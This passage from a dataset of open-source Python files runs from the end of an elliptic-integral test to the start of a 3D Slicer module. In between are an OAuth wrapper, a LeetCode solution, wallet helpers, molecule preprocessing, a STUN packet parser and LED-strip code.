1, 2.0 / n_test, dtype=torch.float32, device=device)\n test_e[-1] = 0.0\n\n tic = time.perf_counter()\n ee_scipy = t_ellipe(test_e)\n s_epe = time.perf_counter() - tic\n\n tic = time.perf_counter()\n ee_n = vmap_ellipe(test_e)\n t_epe = time.perf_counter() - tic\n\n assert_close(ee_scipy, ee_n)\n\n data = {\n \"Name\": [\"scipy_ellipe\", \"scipy_ellipk\", \"vamp_ellipe\", \"vmap_ellipk\"],\n \"Elapsed time (s)\": [s_epe, s_epk, t_epe, t_epk],\n }\n table = Report(f\"Time comparison for elliptic integral\\nn={n_test}\", data)\n table.display()\n\n\ndef test_new_elliptic() -> None:\n n_test = 1000000\n\n device = torch.device(\"cpu\")\n\n test_k = torch.arange(-2, 0.95, 2.95 / n_test, device=torch.device(\"cpu\")).to(\n device=device\n )\n test_k[-1] = 0.0\n\n tic = time.perf_counter()\n s_test = t_ellipk(test_k)\n s_epk = time.perf_counter() - tic\n\n tic = time.perf_counter()\n t_test = t_ellipk_new(test_k)\n n_epk = time.perf_counter() - tic\n\n assert_close(s_test, t_test)\n\n tic = time.perf_counter()\n s_test = t_ellipe(test_k)\n s_epe = time.perf_counter() - tic\n\n tic = time.perf_counter()\n t_test = t_ellipe_new(test_k)\n n_epe = time.perf_counter() - tic\n\n assert_close(s_test, t_test)\n\n\ndef test_elliptic_integral() -> None:\n n_test = 1000\n\n device = torch.device(\"cpu\")\n dtype = torch.float64\n\n test_k = torch.arange(-2, 0.9, 2.9 / n_test, dtype=dtype, device=device)\n\n tic = time.perf_counter()\n s_test = ellipk(test_k)\n s_epk = time.perf_counter() - tic\n\n tic = time.perf_counter()\n t_test = t_ellipk(test_k)\n t_epk = time.perf_counter() - tic\n\n assert_close(s_test, t_test)\n\n test_e = torch.arange(-1, 1, 2.0 / n_test, dtype=dtype, device=device)\n\n tic = time.perf_counter()\n s_test = ellipe(test_e)\n s_epe = time.perf_counter() - tic\n\n tic = time.perf_counter()\n t_test = t_ellipe(test_e)\n t_epe = time.perf_counter() - tic\n\n assert_close(s_test, t_test)\n\n if torch.backends.mps.is_available(): # type: ignore\n device = torch.device(\"mps\")\n dtype = torch.float32\n\n test_e = test_e.to(device=device, dtype=dtype)\n tic = time.perf_counter()\n g_test = t_ellipe(test_e)\n g_epe = time.perf_counter() - tic\n\n assert_close(\n s_test.to(dtype=dtype), g_test.to(device=s_test.device, dtype=dtype)\n )\n\n elif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n dtype = torch.float64\n\n test_e = test_e.to(device=device, dtype=dtype)\n tic = time.perf_counter()\n g_test = t_ellipe(test_e)\n g_epe = time.perf_counter() - tic\n\n assert_close(\n s_test.to(dtype=dtype), g_test.to(device=s_test.device, dtype=dtype)\n )\n else:\n g_epe = \"Not defined\"\n\n table = Table(title=f\"Elliptic integral Performance, n={n_test}\")\n table.add_column(\"Name\", justify=\"center\", style=\"cyan\")\n table.add_column(r\"Elapsed time \\[s]\", justify=\"center\", style=\"green\")\n\n names = [\n \"scipy_ellipe\",\n \"scipy_ellipk\",\n \"torch_ellipe\",\n \"torch_ellipk\",\n \"torch (gpu)\",\n ]\n times = [s_epe, s_epk, t_epe, t_epk, g_epe]\n\n for k, v in zip(names, times):\n table.add_row(k, f\"{v:.5f}\")\n\n console.print(table)\n","repo_name":"kyoungseoun-chung/pymytools","sub_path":"tests/test_special.py","file_name":"test_special.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6009201227","text":"from rauth import OAuth1Service, OAuth2Service\n\n\nclass BaseConnect(object):\n session = None\n service = None\n\n def __init__(self, client_id, secret, name, authorize_url,\n access_token_url, base_url):\n self.service = OAuth2Service(\n client_id=client_id,\n client_secret=secret,\n name=name,\n authorize_url=authorize_url,\n access_token_url=access_token_url,\n base_url=base_url)\n\n def get_authorize_url(self, **kwargs):\n if not kwargs.get('redirect_uri'):\n raise Exception('You must provide a redirect_uri to this function')\n\n return self.service.get_authorize_url(**kwargs)\n\n def get_session(self, code, redirect_uri, **kwargs):\n if self.session:\n return self.session\n\n kwargs.update({'code': code, 'redirect_uri': redirect_uri})\n self.session = self.service.get_auth_session(data=kwargs)\n return self.session\n\n def get_access_token(self, redirect_uri):\n return self.service.get_access_token(\n params={\n 'redirect_uri': redirect_uri,\n 'grant_type': 'client_credentials',\n })\n\n\nclass TwitterConnect(BaseConnect):\n \"\"\"\n Flow to authenticate a user:\n - get_request_token()\n - get_authorize_url()\n - redirects user to authorize_url and get the oauth_verifier in the\n callback\n - get_auth_session(oauth_verifier)\n\n You'll endup with a rauth.session.OAuth1Session and you can call\n anything in twitter api by doing:\n\n Eg:\n # get the info about logedin user\n session.get('account/verify_credentials.json')\n \"\"\"\n access_token_url = 'https://api.twitter.com/oauth/access_token'\n authorize_url = 'https://api.twitter.com/oauth/authorize'\n request_token_url = 'https://api.twitter.com/oauth/request_token'\n base_url = 'https://api.twitter.com/1.1/'\n request_token = None\n\n def __init__(self, consumer_key, consumer_secret):\n self.service = OAuth1Service(\n consumer_key=consumer_key,\n consumer_secret=consumer_secret,\n name='twitter',\n access_token_url=self.access_token_url,\n authorize_url=self.authorize_url,\n request_token_url=self.request_token_url,\n base_url=self.base_url\n )\n\n def get_request_token(self):\n self.request_token, self.request_token_secret = \\\n self.service.get_request_token()\n\n def get_authorize_url(self):\n if not self.request_token:\n raise Exception('You should call get_request_token first')\n return\n\n return self.service.get_authorize_url(self.request_token)\n\n def get_session(self, oauth_verifier):\n if not self.request_token:\n raise Exception('You should call get_request_token first')\n\n return self.service.get_auth_session(\n self.request_token, self.request_token_secret,\n params={'oauth_verifier': oauth_verifier})\n\n\nclass FacebookConnect(BaseConnect):\n \"\"\"\n Flow to authenticate a user:\n - get_authorize_url()\n - Redirects user to this url, wait for callback and get the\n 'code' param\n - get_session(code, redirect_uri)\n\n You'll endup with a rauth.session.OAuth2Session and you can use the\n api as this:\n # get the info about logedin user\n session.get('me')\n \"\"\"\n\n name = 'facebook'\n authorize_url = 'https://graph.facebook.com/oauth/authorize'\n access_token_url = 'https://graph.facebook.com/oauth/access_token'\n base_url = 'https://graph.facebook.com/'\n\n def __init__(self, client_id, secret):\n super(FacebookConnect, self).__init__(\n client_id=client_id,\n secret=secret,\n name=self.name,\n authorize_url=self.authorize_url,\n access_token_url=self.access_token_url,\n base_url=self.base_url)\n\n\nclass GooglePlusConnect(BaseConnect):\n \"\"\"\n Flow to authenticate a user:\n - get_authorize_url()\n - Redirects user to this url, wait for callback and get the\n 'code' param\n - get_session(code, redirect_uri)\n\n You'll endup with a rauth.session.OAuth2Session and you can use the\n api as this:\n # get the info about logedin user\n google_plus_connect.get_userinfo(session)\n \"\"\"\n name = 'google_plus'\n authorize_url = 'https://accounts.google.com/o/oauth2/auth'\n access_token_url = 'https://accounts.google.com/o/oauth2/token'\n base_url = 'https://www.googleapis.com/plus/v1/'\n\n def __init__(self, client_id, secret):\n super(GooglePlusConnect, self).__init__(\n client_id=client_id,\n secret=secret,\n name=self.name,\n authorize_url=self.authorize_url,\n access_token_url=self.access_token_url,\n base_url=self.base_url)\n\n def get_session(self, code, redirect_uri, *args, **kwargs):\n kwargs.update({\n 'code': code,\n 'redirect_uri': redirect_uri,\n 'client_id': self.service.client_id,\n 'client_secret': self.service.client_secret,\n 'grant_type': 'authorization_code'\n })\n response = self.service.get_raw_access_token(data=kwargs)\n response = response.json()\n return self.service.get_session(response['access_token'])\n\n def get_userinfo(self, session):\n if not type(session) == 'rauth.session.OAuth2Session':\n raise Exception('Expect rauth.session.OAuth2Session object '\n 'instead got a %s' % (type(session)))\n return session.get(\n 'https://www.googleapis.com/oauth2/v1/userinfo').json()\n","repo_name":"raphapassini/rauth_wrapper","sub_path":"oauth_manager.py","file_name":"oauth_manager.py","file_ext":"py","file_size_in_byte":5746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"27235246101","text":"#\n# @lc app=leetcode id=300 lang=python\n#\n# [300] Longest Increasing Subsequence\n#\nclass Solution(object):\n def lengthOfLIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # if not nums:\n # return 0\n # l = [1 for _ in range(len(nums))]\n # for i in range(1, len(nums)):\n # for j in range(i):\n # if nums[j] < nums[i]:\n # l[i] = max(l[i], l[j]+1)\n # return max(l) \n if not nums:\n return 0\n lst = [nums[0]]\n for n in nums[1:]:\n if n > lst[-1]:\n lst.append(n)\n continue\n \n left, right = 0, len(lst)-1\n while left < right:\n mid = (left + right) >> 1\n if lst[mid] >= n:\n right = mid\n else:\n left = mid + 1\n lst[left] = n\n return len(lst) \n\n","repo_name":"tangwz/leetcode","sub_path":"leetcode/python3/longest-increasing-subsequence.py","file_name":"longest-increasing-subsequence.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"2375153798","text":"from brownie import accounts, config\nimport secrets\nimport json\n\n\ndef get_account():\n owner = accounts.add(config[\"wallets\"][\"from_key\"])\n print(\"==================================================\")\n print(f\"Address of the owner {owner.address}\")\n print(\"==================================================\")\n return owner\n\n\ndef create_wallet():\n private_key = secrets.token_hex(32)\n wallet = accounts.add(private_key=private_key)\n wallet_dict: dict = {\n \"address\": wallet.address,\n \"key\": f\"0x{private_key}\"\n }\n with open(\"wallet.json\", \"w\") as file:\n json.dump(wallet_dict, file)\n print(\"==================================================\")\n print(f\"Address of the wallet {wallet.address}\")\n print(\"=================================================\")\n return wallet.address\n","repo_name":"Muti-Kara/sylvest_token","sub_path":"scripts/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"6260702683","text":"from common.csv_utils import CsvWriter\nfrom common.io import read_text_file, get_file_name, get_dir\nfrom utils.linq_tokenizr import linq_encode, linq_tokenize\nfrom utils.tsql_tokenizr import tsql_encode, tsql_tokenize\n\ndef write_train_csv(file: str):\n lines = read_text_file(file)\n out_file = \"./output/linq-translation.csv\"\n src_max_seq_length = 0\n tgt_max_seq_length = 0\n with CsvWriter(out_file) as csv:\n for idx, line in enumerate(lines):\n if idx % 2 == 0:\n linq_values = linq_encode(line)\n src_max_seq_length = max(len(linq_values), src_max_seq_length)\n csv.write(linq_values)\n else:\n sql_values = tsql_encode(line)\n tgt_max_seq_length = max(len(sql_values), tgt_max_seq_length)\n csv.write(sql_values)\n return src_max_seq_length, tgt_max_seq_length\n\n\ndef get_line_str(arr):\n return ' '.join(str(number) for number in arr)\n\ndef write_train_data(file: str):\n lines = read_text_file(file)\n out_file = \"./output/linq-translation.txt\"\n src_max_seq_length = 0\n tgt_max_seq_length = 0\n with open(out_file, \"w\", encoding='UTF-8') as f:\n for idx, line in enumerate(lines):\n if idx % 2 == 0:\n linq_values = linq_encode(line)\n src_max_seq_length = max(len(linq_values), src_max_seq_length)\n f.write(get_line_str(linq_values) + '\\n')\n else:\n sql_values = tsql_encode(line)\n tgt_max_seq_length = max(len(sql_values), tgt_max_seq_length)\n f.write(get_line_str(sql_values) + '\\n')\n return src_max_seq_length, tgt_max_seq_length\n\n\ndef flatten(l):\n return [item for sublist in l for item in sublist]\n\ndef write_tokens_data(file: str):\n lines = read_text_file(file)\n out_file = \"./output/linq-translation-tokens.txt\"\n def map_tokens(tokens):\n return map(lambda x: f\"{{{x.type}:{x.text}}}\", tokens)\n with CsvWriter(out_file) as csv:\n for idx, line in enumerate(lines):\n if idx % 2 == 0:\n linq_tokens = linq_tokenize(line)\n tokens = map_tokens(linq_tokens)\n csv.write(tokens)\n else:\n sql_tokens = tsql_tokenize(line)\n tokens = map_tokens(sql_tokens)\n csv.write(tokens)\n\n\n","repo_name":"flashlin/Samples","sub_path":"Tempermonkey-vue3-tfjs/py/utils/linq_translation_data.py","file_name":"linq_translation_data.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"32003674600","text":"'''\n\n클래스\n 객체를 만드는 설계도\n 붕어빵 틀, 와플 기계\n 인스턴스화 - 메모리에 올리는 것\n\n객체(object)\n 현실 세계 존재 하는 물리적, 추상적 식별할 수 있는 모든 것\n ex) 컴퓨터, 학생, 주문, 배송\n\n객체 구성\n 생성자 - 초기화용\n 속성 값 - 변수\n 기능 - 메서드(함수)\n\n'''\n\n# Computer 클래스 정의\nclass Computer:\n \n # 첫번째 매개변수가 self 이므로 인스턴스 메소드이다\n # self를 제외한 나머지 매개변수에 실제로 사용될 데이터가 전달된다\n def set_spec(self, cpu, ram, vga, ssd):\n self.cpu = cpu\n # self.cpu: 멤버 변수, cpu: 지역 변수\n self.ram = ram\n self.vga = vga\n self.ssd = ssd\n\n def hardware_info(self):\n print('CPU = {}'.format(self.cpu))\n print('RAM = {}'.format(self.ram))\n print('VGA = {}'.format(self.vga))\n print('SSD = {}'.format(self.ssd))\n return\n\n# 객체 생성\ndesktop = Computer()\ndesktop.set_spec('i7', '16GB', 'GTX3060', '512GB')\ndesktop.hardware_info()\nprint()\n\ndesktop.cpu = 'i9'\ndesktop.hardware_info()\nprint()\n\nmacbook = Computer()\nmacbook.set_spec('M2', '16GB', 'M2', '512GB')\nmacbook.hardware_info()\nprint()\n\nprint(id(desktop)==id(macbook)) # False 같은 클래스지만 다른 객체\n# call by reference, 주소값으로 값을 호출 : id() 함수","repo_name":"Kimbabbab/pythonBasic","sub_path":"Day07/Section15/Ex15-1-object.py","file_name":"Ex15-1-object.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8265686279","text":"# torus environment\nfrom environment import super_environment\nimport constant\nfrom calculation import calc\n\nimport pygame\nimport random\nimport math\n\n\nclass TorusEnvironment(super_environment.Environment):\n def __init__(self, size_x, size_y):\n super().__init__(size_x, size_y)\n x_center = size_x / 2\n y_center = size_y / 2\n self.center_position = x_center, y_center\n\n @staticmethod\n def environment_type():\n return 'torus'\n\n def get_converted_position(self, position_before, position_after, radius):\n # if the position over the edge , go to opposite position.端に行ったら反対側に行く\n x = position_after[0]\n if x < 0:\n x += self.screen_size_x\n elif x > self.screen_size_x:\n x -= self.screen_size_x\n y = position_after[1]\n if y < 0:\n y += self.screen_size_y\n elif y > self.screen_size_y:\n y -= self.screen_size_y\n return x, y\n\n def max_distance(self):\n x = self.screen_size_x / 2\n y = self.screen_size_y / 2\n return math.sqrt(x * x + y * y)\n\n def position_number_torus(self, position):\n # 0:left above, 1:right above, 10:left below, 11:right below\n x = position[0]\n y = position[1]\n x_center = self.center_position[0]\n y_center = self.center_position[1]\n if x < x_center:\n # x is left\n if y < y_center:\n return 0\n return 10\n # x is right\n if y < y_center:\n return 1\n return 11\n\n def position_relation(self, po1, po2):\n # 0:same area, 1:po2 is right, 2:po2 is left, 3:po2 is above, 4:po2 is below, 13,14,23,24:po2 is diagonal\n area1 = self.position_number_torus(po1)\n area2 = self.position_number_torus(po2)\n dif = area1 - area2\n if dif == 0:\n return 'same'\n elif dif == 10:\n return 'above'\n elif dif == -10:\n return 'below'\n elif dif == 1:\n return 'left'\n elif dif == -1:\n return 'right'\n elif dif == 11:\n return 'left_above'\n elif dif == 9:\n return 'right_above'\n elif dif == -11:\n return 'right_below'\n elif dif == -9:\n return 'left_below'\n else:\n print(\"error: not match the number in position_relation function in calc file\")\n return 'error'\n\n def smaller_dis_dire(self, dis_dire1, dis_dire2):\n # return the smaller one. pair of the distance and direction\n if dis_dire1[0] < dis_dire2[0]:\n return dis_dire1\n return dis_dire2\n\n def get_distance_direction_torus(self, po1, po2):\n relation = self.position_relation(po1, po2)\n dis_dire_normal = super().distance(po1, po2), super().aim_direction(po1, po2)\n if relation == 'same':\n return dis_dire_normal\n if relation == 'above':\n # po2 is above po1\n position_n = po2[0], po2[1] + self.screen_size_y\n dis_dire = super().distance(po1, position_n), super().aim_direction(po1, position_n)\n return self.smaller_dis_dire(dis_dire_normal, dis_dire)\n elif relation == 'below':\n position_n = po2[0], po2[1] - self.screen_size_y\n dis_dire = super().distance(po1, position_n), super().aim_direction(po1, position_n)\n return self.smaller_dis_dire(dis_dire_normal, dis_dire)\n elif relation == 'left':\n position_n = po2[0] + self.screen_size_x, po2[1]\n dis_dire = super().distance(po1, position_n), super().aim_direction(po1, position_n)\n return self.smaller_dis_dire(dis_dire_normal, dis_dire)\n elif relation == 'right':\n position_n = po2[0] - self.screen_size_x, po2[1]\n dis_dire = super().distance(po1, position_n), super().aim_direction(po1, position_n)\n return self.smaller_dis_dire(dis_dire_normal, dis_dire)\n elif relation == 'left_above':\n position_n1 = po2[0] + self.screen_size_x, po2[1] # right above\n position_n2 = po2[0] + self.screen_size_x, po2[1] + self.screen_size_y # right below\n position_n3 = po2[0], po2[1] + self.screen_size_y # left below\n dis_dire1 = super().distance(po1, position_n1), super().aim_direction(po1, position_n1)\n dis_dire2 = super().distance(po1, position_n2), super().aim_direction(po1, position_n2)\n dis_dire3 = super().distance(po1, position_n3), super().aim_direction(po1, position_n3)\n dis_dire = self.smaller_dis_dire(dis_dire_normal, dis_dire1)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire2)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire3)\n return dis_dire\n elif relation == 'right_above':\n position_n1 = po2[0] - self.screen_size_x, po2[1] # left above\n position_n2 = po2[0] - self.screen_size_x, po2[1] + self.screen_size_y # left below\n position_n3 = po2[0], po2[1] + self.screen_size_y # right below\n dis_dire1 = super().distance(po1, position_n1), super().aim_direction(po1, position_n1)\n dis_dire2 = super().distance(po1, position_n2), super().aim_direction(po1, position_n2)\n dis_dire3 = super().distance(po1, position_n3), super().aim_direction(po1, position_n3)\n dis_dire = self.smaller_dis_dire(dis_dire_normal, dis_dire1)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire2)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire3)\n return dis_dire\n elif relation == 'left_below':\n position_n1 = po2[0] + self.screen_size_x, po2[1] # right below\n position_n2 = po2[0] + self.screen_size_x, po2[1] - self.screen_size_y # right above\n position_n3 = po2[0], po2[1] - self.screen_size_y # left above\n dis_dire1 = super().distance(po1, position_n1), super().aim_direction(po1, position_n1)\n dis_dire2 = super().distance(po1, position_n2), super().aim_direction(po1, position_n2)\n dis_dire3 = super().distance(po1, position_n3), super().aim_direction(po1, position_n3)\n dis_dire = self.smaller_dis_dire(dis_dire_normal, dis_dire1)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire2)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire3)\n return dis_dire\n elif relation == 'right_below':\n position_n1 = po2[0] - self.screen_size_x, po2[1] # left below\n position_n2 = po2[0] - self.screen_size_x, po2[1] - self.screen_size_y # left above\n position_n3 = po2[0], po2[1] - self.screen_size_y # right above\n dis_dire1 = super().distance(po1, position_n1), super().aim_direction(po1, position_n1)\n dis_dire2 = super().distance(po1, position_n2), super().aim_direction(po1, position_n2)\n dis_dire3 = super().distance(po1, position_n3), super().aim_direction(po1, position_n3)\n dis_dire = self.smaller_dis_dire(dis_dire_normal, dis_dire1)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire2)\n dis_dire = self.smaller_dis_dire(dis_dire, dis_dire3)\n return dis_dire\n else:\n print(\"error : no area in get_distance_torus function in calc file\")\n return 0, 0\n\n def distance(self, po1, po2):\n # calculate the distance.\n return self.get_distance_direction_torus(po1, po2)[0]\n\n def aim_direction(self, position_from, aim_position):\n # calculate the direction.\n return self.get_distance_direction_torus(position_from, aim_position)[1]\n\n","repo_name":"st34-satoshi/CAR","sub_path":"environment/torus_environment.py","file_name":"torus_environment.py","file_ext":"py","file_size_in_byte":7737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"69802353857","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @Time : 2022/8/4 7:44 下午\n# @Author : daiyizheng\n# @Version:V 0.1\n# @File : moflow_preprocessor.py\n# @desc :\nfrom __future__ import annotations, print_function\nimport logging\nimport traceback\nfrom typing import List, Text, Tuple, Dict\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom rdkit import Chem\nfrom rdkit.Chem.rdchem import Mol\n\nfrom drugai.models.dataset import NumpyTupleDataset\nfrom ..message import Message\nfrom drugai.shared.preprocess.preprocessor import Preprocessor\nfrom drugai.utils.common import type_check_num_atoms\n\nlogger = logging.getLogger(__name__)\n\nATOM_VALENCY = {6:4, 7:3, 8:2, 9:1, 15:3, 16:2, 17:1, 35:1, 53:1}\n\nclass MoFlowPreprocessor(Preprocessor):\n def __init__(self, \n max_atoms:int=None,\n **kwargs\n )->None:\n if max_atoms is None:\n raise ValueError('max_atoms must be provided')\n self.max_atoms = max_atoms\n self.bond_type_token_to_id = {\n Chem.BondType.SINGLE: 0,\n Chem.BondType.DOUBLE: 1,\n Chem.BondType.TRIPLE: 2,\n Chem.BondType.AROMATIC: 3\n }\n super(MoFlowPreprocessor, self).__init__(**kwargs)\n \n def prepare_smiles_and_mol(self, mol):\n \"\"\"Prepare `smiles` and `mol` used in following preprocessing.\n This method is called before `get_input_features` is called, by parser\n class.\n This method may be overriden to support custom `smile`/`mol` extraction\n \"\"\"\n # Note that smiles expression is not unique.\n # we obtain canonical smiles which is unique in `mol`\n canonical_smiles = Message.mol_to_smiles(mol=mol, isomericSmiles=False, canonical=True)\n canonical_mol = Message.smiles_to_mol(canonical_smiles)\n if self.add_Hs:\n canonical_mol = Message.add_Hs(canonical_mol)\n if self.kekulize:\n Message.kekulize(canonical_mol)\n return canonical_smiles, canonical_mol\n\n\n def get_input_features(self, \n mol:Mol\n )->Tuple[np.ndarray, np.ndarray]:\n\n type_check_num_atoms(mol, self.max_atoms)\n atom_array = Message.get_atom_ids(mol=mol, max_length=self.max_atoms, atom_token_to_id=self.atom_token_to_id)\n adj_array = self.construct_discrete_edge_matrix(mol, out_size=self.max_atoms)\n return atom_array, adj_array\n\n def construct_discrete_edge_matrix(self, \n mol:Mol, \n out_size:int=None\n )->np.ndarray:\n \"\"\"Returns the edge-type dependent adjacency matrix of the given molecule.\"\"\"\n if mol is None:\n raise KeyError('mol is None')\n \n N = Message.get_atom_num(mol=mol)\n\n if out_size is None or out_size <=0:\n raise ValueError(\"out_size must be provided and > 0\")\n elif out_size >= N:\n size = out_size\n else:\n raise ValueError(\n 'out_size {} is smaller than number of atoms in mol {}, smiles is {}'\n .format(out_size, N, Message.mol_to_smiles(mol=mol)))\n\n adjs = np.zeros((4, size, size), dtype=np.float32)\n\n \n for bond in mol.GetBonds():\n bond_type = bond.GetBondType()\n ch = self.bond_type_token_to_id[bond_type]\n i = bond.GetBeginAtomIdx()\n j = bond.GetEndAtomIdx()\n adjs[ch, i, j] = 1.0\n adjs[ch, j, i] = 1.0\n return adjs \n \n def pre_process(self, \n dataset:List,\n **kwargs\n )->Tuple:\n \"\"\"Preprocess the dataset.\n This method is called before `get_input_features` is called, by parser\n \"\"\"\n ## filter mol \n logger.info(\"Preprocessing dataset start...\")\n c_mols = []\n c_smiles = []\n for message in tqdm(dataset, total=len(dataset)):\n try:\n mol = Message.smiles_to_mol(message.smiles)\n canonical_smiles, mol = self.prepare_smiles_and_mol(mol)\n c_mols.append(mol)\n c_smiles.append(canonical_smiles)\n \n except Exception as e:\n logger.warning('parse(), type: {}, {}' .format(type(e).__name__, e.args))\n logger.info(traceback.format_exc())\n continue\n \n if self.__dict__.get(\"max_atoms\", None) is not None:\n c_mols = self.filter_mol(c_mols)\n \n if self.__dict__.get('bond_type_token_to_id', None) is None:\n self.bond_type_token_to_id, self.bond_type_id_to_token = self.bond_type_map(c_mols)\n \n if self.__dict__.get(\"atom_token_to_id\", None) is None:\n self.atom_token_to_id, self.atom_id_to_token = self.atom_type_map(c_mols)\n \n logger.info(\"load atom features and adj features start...\")\n messages = []\n for c_m, c_s in tqdm(list(zip(c_mols,c_smiles))):\n atom_features, adj_features = self.get_input_features(c_m)\n messages.append(Message(smiles=c_s, atom_matrix=atom_features, adj_matrix=adj_features))\n logger.info(\"load atom features and adj features end...\")\n\n logger.info(\"Preprocessing dataset end...\")\n return NumpyTupleDataset(datasets = messages, **kwargs)","repo_name":"daiyizheng/drugai","sub_path":"drugai/shared/preprocess/moflow_preprocessor.py","file_name":"moflow_preprocessor.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"34076039747","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom django.views.generic import RedirectView\n\nurlpatterns = [\n path('', RedirectView.as_view(url='notes/'), name='index'),\n path('notes/', include('notes.urls', namespace='notes')),\n path('accounts/', include('accounts.urls', namespace='accounts')),\n path('api/', include('api.urls', namespace='api')),\n path('admin/', admin.site.urls),\n]\n","repo_name":"TonikX/ITMO_ICT_WebDevelopment_2021-2022","sub_path":"students/K33402/Komarov_Georgy/LAB2/elevennote/src/config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"15009564630","text":"\"\"\"\nSimple Traversal of UDP through NAT (STUN).\nRFC 3489\nhttp://tools.ietf.org/html/rfc3489\n\"\"\"\nimport logging\n\nfrom pypacker.pypacker import Packet\nfrom pypacker import triggerlist\nfrom pypacker.structcbs import unpack_H\n\nlogger = logging.getLogger(\"pypacker\")\n\n# Message Types\nBINDING_REQUEST = 0x0001\nBINDING_RESPONSE = 0x0101\nBINDING_ERROR_RESPONSE = 0x0111\nSHARED_SECRET_REQUEST = 0x0002\nSHARED_SECRET_RESPONSE = 0x0102\nSHARED_SECRET_ERROR_RESPONSE = 0x0112\n\n# Message Attributes\nMAPPED_ADDRESS = 0x0001\nRESPONSE_ADDRESS = 0x0002\nCHANGE_REQUEST = 0x0003\nSOURCE_ADDRESS = 0x0004\nCHANGED_ADDRESS = 0x0005\nUSERNAME = 0x0006\nPASSWORD = 0x0007\nMESSAGE_INTEGRITY = 0x0008\nERROR_CODE = 0x0009\nUNKNOWN_ATTRIBUTES = 0x000a\nREFLECTED_FROM = 0x000b\n\n\nclass StunAttr(Packet):\n\t__hdr__ = (\n\t\t(\"type\", \"H\", 0),\n\t\t(\"len\", \"H\", 0),\n\t)\n\n\nclass STUN(Packet):\n\t# 20 byte header followed by 0 or more attribute TLVs.\n\t__hdr__ = (\n\t\t(\"type\", \"H\", 0),\n\t\t(\"len\", \"H\", 0),\n\t\t(\"cookie\", \"I\", 0),\n\t\t(\"xid\", \"12s\", b\"\\x00\" * 14),\n\t\t(\"attrs\", None, triggerlist.TriggerList)\n\t)\n\n\t@staticmethod\n\tdef __parse_attrs(buf):\n\t\tattributes = []\n\t\toff = 0\n\n\t\t# t:2 l:2 v:x\n\t\twhile off < len(buf):\n\t\t\tl_content = unpack_H(buf[off + 2: off + 4])[0]\n\t\t\tpadding = (4 - (l_content % 4)) % 4\n\t\t\tl_total = l_content + padding + 2 + 2\n\t\t\t#logger.debug(\"STUN attr l_content: %d, padding: %d, value: %s\" %\n\t\t\t#\t (l_content, padding, buf[off : off + l_total]))\n\t\t\tattributes.append(StunAttr(buf[off: off + l_total]))\n\t\t\toff += l_total\n\t\treturn attributes\n\n\tdef _dissect(self, buf):\n\t\t# logger.debug(\"dissecting: %s\" % buf)\n\t\tself._init_triggerlist(\"attrs\", buf[20:], self.__parse_attrs)\n\t\treturn len(buf)\n","repo_name":"mike01/pypacker","sub_path":"pypacker/layer567/stun.py","file_name":"stun.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"79"} +{"seq_id":"10261456390","text":"import board\nimport neopixel\nimport time\nimport sys\nimport signal\n\nnum_pixels = 150\npixels = neopixel.NeoPixel(board.D18, num_pixels, brightness=0.2, auto_write=False)\n\ndef end(signum, frame):\n pixels.fill((0, 0, 0))\n pixels.show()\n sys.exit(0)\n\nchristmas_colors = [(0, 255, 0), (255, 0, 0), (255, 255, 255)]\nhanukkah_colors = [(0, 0, 255), (255, 255, 255), (0, 0, 255)]\nkwanzaa_colors = [(255, 0, 0), (0, 255, 0), (0, 0, 0)]\n\ncolor_list = []\ncolor_list.append(christmas_colors)\ncolor_list.append(hanukkah_colors)\ncolor_list.append(kwanzaa_colors)\n\nsignal.signal(signal.SIGTERM, end)\nsignal.signal(signal.SIGINT, end)\n\nj = 0\nk = 0\nx = 0\ny = x + 1\nz = 0\nwhile True: \n for i in range(0, num_pixels-10, 10):\n for j in range(10):\n if ( i % 3 == x ):\n pixels[i+j] = color_list[z][0]\n elif ( i % 3 == y ):\n pixels[i+j] = color_list[z][1]\n else:\n pixels[i+j] = color_list[z][2]\n \n pixels.show()\n time.sleep(0.5)\n \n x = (x + 1) % 3\n y = (y + 1) % 3\n k = k + 1\n if (k % 150) == 0:\n z = (z + 1) % 3\n","repo_name":"p8walsh/WS2812LED_PythonCode","sub_path":"holiday_flash.py","file_name":"holiday_flash.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38075572265","text":"import os\nimport unittest\nimport vtk, qt, ctk, slicer\nfrom slicer.ScriptedLoadableModule import *\nimport logging\n\n#\n# ScrModule\n#\n\nclass ScrModule(ScriptedLoadableModule):\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n 